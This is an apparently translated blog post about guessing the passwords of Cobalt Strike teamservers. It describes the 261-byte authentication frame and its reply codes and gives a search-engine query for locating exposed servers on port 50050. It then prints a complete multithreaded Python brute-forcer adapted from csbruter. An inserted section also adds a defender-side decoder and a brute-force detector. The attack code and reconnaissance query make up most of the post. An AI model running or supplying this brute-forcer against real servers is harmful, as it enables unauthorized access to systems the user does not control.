Blue decides red - burst CS teamserver password
2022-07-03 00:15:00 【Lomi only bear】
0x00: Brief introduction
Cobalt Strike (hereinafter referred to as CS)
As everyone knows, CS is a GUI-framework "multiplayer" penetration testing tool built on the basis of MSF. It integrates port forwarding, service scanning, automatic overflow, multi-mode port listening, exe and powershell trojan generation, and so on.
Its phishing attacks include: site cloning, target information collection, Java execution, automatic browser attacks, and so on.
Cobalt Strike is mainly used in team operations and can be called an artifact of team penetration: it allows multiple attackers to connect to the team server at the same time and share attack resources, target information and sessions.
As a collaborative APT tool, Cobalt Strike's penetration testing and intranet APT controller functions have made it the first choice of many APT groups.
0x01: Origin
1、 For the convenience of teammates connecting quickly, many teams set weak Teamserver passwords; common ones are 123456, 123123, etc.
2、 Many also use the default Teamserver port, 50050.
3、 Putting the weak points above together, start testing brute-force connections.
0x02: Writing it
One 、 Connection test against your own teamserver. After the server is set up, test access through a browser. The Google Chrome test result is as follows.
The Firefox test result is as follows.
Press F12 to see what happens.
Two 、 Let's have a look at the Teamserver authentication method.

```bash
if [ -e ./cobaltstrike.store ]; then
    print_info "Will use existing X509 certificate and keystore (for SSL)"
else
    print_info "Generating X509 certificate and keystore (for SSL)"
    keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi
# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
```
The first stage is a raw-data password check, ostensibly used to protect the socket authentication.
The second stage is authentication based on Java serialized objects, which includes user names that are mostly symbols.
Among these, cobaltstrike.store looks like this:
The first authentication request is a fixed 261-byte command, roughly defined like this:

```
4 bytes   Magic              \x00\x00\xBE\xEF
1 byte    Password length    (unsigned int)
n bytes   Password           (unsigned int cast to a char array)
padding   "A" * (256 - len(Password))
```

On the wire it looks like this. The padding is ignored and could be anything; the authentication routine reads at most 256 bytes as the password "length":

```
\x00\x00\xBE\xEF\x08passwordAAAAAAAAAAAAAA...AAAA
```

If the supplied password matches the password defined when the team server was started, the team server replies with 4 bytes (this password cannot be empty):

```
\x00\x00\xCA\xFE
```

Otherwise, the team server returns null:

```
\x00\x00\x00\x00
```
Three 、 python3 writing ideas

```python
conn.open(host, port)
# 4-byte magic, 1-byte unsigned length, password padded with "A" to 256 bytes
payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=False) + bytes(bytes(password, "ascii").ljust(256, b"A"))
conn.send(payload)
```

Finally, check whether the returned result contains "\x00\x00\xca\xfe"; if it does, the password is correct.
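The frame layout and the two reply values above, as an added example that is not part of the original post or of csbruter: a decoder for the 261-byte first-stage request and its 4-byte reply, plus the defender-side check a teamserver operator would want, which flags a source that collects repeated \x00\x00\x00\x00 replies within a short window (exactly what the test described in this post produces). The sample traffic, the 203.0.113.5 and 198.51.100.7 addresses, the threshold and the window size are constructed assumptions, not values from the page.

```python
"""Decode Cobalt Strike teamserver first-stage auth frames and flag
repeated failures. Added example; not part of the original post or csbruter."""
from collections import defaultdict

MAGIC_REQUEST = b"\x00\x00\xbe\xef"   # 4-byte request magic from the page
REPLY_OK = b"\x00\x00\xca\xfe"        # 4-byte reply on a correct password
REPLY_FAIL = b"\x00\x00\x00\x00"      # 4-byte reply on a wrong password
FRAME_LEN = 4 + 1 + 256               # magic + length byte + password/padding = 261


def build_auth_frame(password: bytes) -> bytes:
    """Build the first-stage request as the page describes it.
    Used here only to construct sample traffic for the decoder."""
    # the length field is one unsigned byte, so 1..255 is the usable range
    if not 0 < len(password) < 256:
        raise ValueError("password must be 1..255 bytes")
    return MAGIC_REQUEST + bytes([len(password)]) + password.ljust(256, b"A")


def parse_auth_frame(frame: bytes) -> dict:
    """Split a request frame into length, password and padding.
    Raises ValueError for anything that is not a first-stage request."""
    if len(frame) != FRAME_LEN:
        raise ValueError("expected %d bytes, got %d" % (FRAME_LEN, len(frame)))
    if frame[:4] != MAGIC_REQUEST:
        raise ValueError("bad magic")
    length = frame[4]                       # unsigned, so at most 255
    return {"length": length,
            "password": frame[5:5 + length],
            "padding": frame[5 + length:]}  # server ignores these bytes


def classify_reply(reply: bytes) -> str:
    """Map the 4-byte reply to a verdict."""
    if reply == REPLY_OK:
        return "success"
    if reply == REPLY_FAIL:
        return "failure"
    return "unknown"


def detect_bruteforce(events, threshold=5, window=60.0):
    """events: iterable of (timestamp, src_ip, request_frame, reply_bytes).
    Returns {src_ip: description} for sources with >= threshold failed
    first-stage logins inside `window` seconds (threshold/window are assumed)."""
    recent_failures = defaultdict(list)    # src -> failure timestamps in window
    alerts = {}
    for ts, src, request, reply in sorted(events, key=lambda e: e[0]):
        try:
            parse_auth_frame(request)      # only count real first-stage requests
        except ValueError:
            continue
        verdict = classify_reply(reply)
        if verdict == "failure":
            in_window = [t for t in recent_failures[src] if ts - t <= window] + [ts]
            recent_failures[src] = in_window
            if len(in_window) >= threshold and src not in alerts:
                alerts[src] = "%d failed teamserver logins within %.0fs" % (len(in_window), window)
        elif verdict == "success" and src in alerts:
            # a success right after a burst of failures is the case worth escalating
            alerts[src] += "; followed by a successful login"
    return alerts


def make_sample_events():
    """Constructed sample traffic (not a real capture): one source cycles through
    the weak passwords the post mentions and then succeeds; another mistypes once."""
    guesses = [b"123456", b"123123", b"password", b"admin", b"qwerty", b"letmein"]
    t0 = 1000.0
    events = [(t0 + i, "203.0.113.5", build_auth_frame(g), REPLY_FAIL)
              for i, g in enumerate(guesses)]
    events.append((t0 + 7, "203.0.113.5", build_auth_frame(b"S3cret!"), REPLY_OK))
    events.append((t0 + 3, "198.51.100.7", build_auth_frame(b"typo"), REPLY_FAIL))
    return events


if __name__ == "__main__":
    for src, why in detect_bruteforce(make_sample_events()).items():
        print(src, "->", why)
```

The decoder only needs the length byte and the two reply constants from the page; everything the server ignores (the "A" padding) is returned but never used for the verdict, so a decoder fed real traffic behaves the same whether the padding is "A" or anything else.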
Four 、 Finding exposed Teamservers

```
"Cobalt strike" && port="50050"
```

Five 、 Running it
```python
#!/usr/bin/env python3
import time, socket, ssl, argparse, concurrent.futures, sys

MIN_PYTHON = (3, 3)
if sys.version_info < MIN_PYTHON:
    sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)

parser = argparse.ArgumentParser()
parser.add_argument("host",
                    help="Teamserver address")
parser.add_argument("wordlist", nargs="?",
                    help="Newline-delimited word list file")
args = parser.parse_args()


class NotConnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node


class DisconnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node


class Connector:
    def __init__(self):
        self.sock = None
        self.ssl_sock = None
        # the teamserver uses a self-signed certificate, so verification is disabled
        self.ctx = ssl.SSLContext()
        self.ctx.verify_mode = ssl.CERT_NONE

    def is_connected(self):
        return self.sock and self.ssl_sock

    def open(self, hostname, port):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(10)
        self.ssl_sock = self.ctx.wrap_socket(self.sock)
        if hostname == socket.gethostname():
            ipaddress = socket.gethostbyname_ex(hostname)[2][0]
            self.ssl_sock.connect((ipaddress, port))
        else:
            self.ssl_sock.connect((hostname, port))

    def close(self):
        if self.sock:
            self.sock.close()
            self.sock = None
            self.ssl_sock = None

    def send(self, buffer):
        if not self.ssl_sock:
            raise NotConnectedException("Not connected (SSL Socket is null)")
        self.ssl_sock.sendall(buffer)

    def receive(self):
        # the reply is 4 bytes: \x00\x00\xca\xfe on success, \x00\x00\x00\x00 otherwise
        if not self.ssl_sock:
            raise NotConnectedException("Not connected (SSL Socket is null)")
        received_size = 0
        data_buffer = b""
        while received_size < 4:
            data_in = self.ssl_sock.recv()
            if not data_in:
                # peer closed the connection before 4 bytes arrived; avoid looping forever
                raise DisconnectedException("Connection closed by teamserver")
            data_buffer = data_buffer + data_in
            received_size += len(data_in)
        return data_buffer


def passwordcheck(password):
    if len(password) > 0:
        result = None
        conn = Connector()
        conn.open(args.host, 50050)
        # 4-byte magic, 1-byte unsigned length, password padded with "A" to 256 bytes
        payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=False) + bytes(bytes(password, "ascii").ljust(256, b"A"))
        conn.send(payload)
        if conn.is_connected(): result = conn.receive()
        if conn.is_connected(): conn.close()
        if result == bytearray(b"\x00\x00\xca\xfe"): return password
        else: return False
    else: print("Do not have a blank password!!!")


passwords = []
if args.wordlist: passwords = open(args.wordlist).read().split("\n")
else:
    for line in sys.stdin: passwords.append(line.rstrip())

if len(passwords) > 0:
    attempts = 0
    failures = 0
    with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
        future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}
        for future in concurrent.futures.as_completed(future_to_check):
            password = future_to_check[future]
            try:
                data = future.result()
                attempts = attempts + 1
                if data:
                    print("Successful Attack!!!")
                    print("Secquan NB!!")
                    print("Target Password: {}".format(password))
            except Exception as exc:
                failures = failures + 1
                print('%r generated an exception: %s' % (password, exc))
else:
    print("Password(s) required")
```

Way of execution: test.py x.x.x.x pass.txt
pass.txt is the password file you want to try.
Article reference:
https://github.com/ryanohoro/csbruter